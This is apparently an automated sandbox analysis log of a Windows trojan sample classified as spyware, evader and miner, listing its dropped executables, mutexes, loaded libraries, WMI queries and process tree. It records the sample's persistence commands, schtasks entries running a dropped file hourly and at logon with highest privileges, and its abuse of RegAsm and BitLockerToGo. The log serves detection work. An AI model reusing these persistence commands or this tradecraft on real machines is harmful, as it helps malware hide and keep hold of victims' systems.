Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Ca01BQGh9DxiBOJwup.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Ca01BQGh9DxiBOJwup.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@95/138@13/24
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 7_2_00409448
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource, 7_2_00409BEC
Source: C:\Users\user\Desktop\gobEmOm5sr.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gobEmOm5sr.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8032
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\UipomonaWW_2
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8024
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Mutant created: \Sessions\1\BaseNamedObjects\IntelPowerEExpert
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe File created: C:\Users\user\AppData\Local\Temp\is-9E297.tmp Jump to behavior
Source: gobEmOm5sr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gobEmOm5sr.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Program Files (x86)\desktop.ini
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: gobEmOm5sr.exe ReversingLabs: Detection: 55%
Source: gobEmOm5sr.exe Virustotal: Detection: 53%
Source: lenTsqDIajevXTuJaJ03oKGb.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\gobEmOm5sr.exe "C:\Users\user\Desktop\gobEmOm5sr.exe"
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8032 -ip 8032
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Process created: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp "C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp" /SL5="$20496,3169907,54272,C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8024 -ip 8024
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 852
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 824
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe "C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe"
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Process created: C:\Users\user\AppData\Local\NewStar\newstar.exe "C:\Users\user\AppData\Local\NewStar\newstar.exe" -i
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: unknown Process created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\SysWOW64\WerFault.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe "C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Process created: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp "C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp" /SL5="$20496,3169907,54272,C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8032 -ip 8032
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8024 -ip 8024
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 852
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 824
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Process created: C:\Users\user\AppData\Local\NewStar\newstar.exe "C:\Users\user\AppData\Local\NewStar\newstar.exe" -i
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
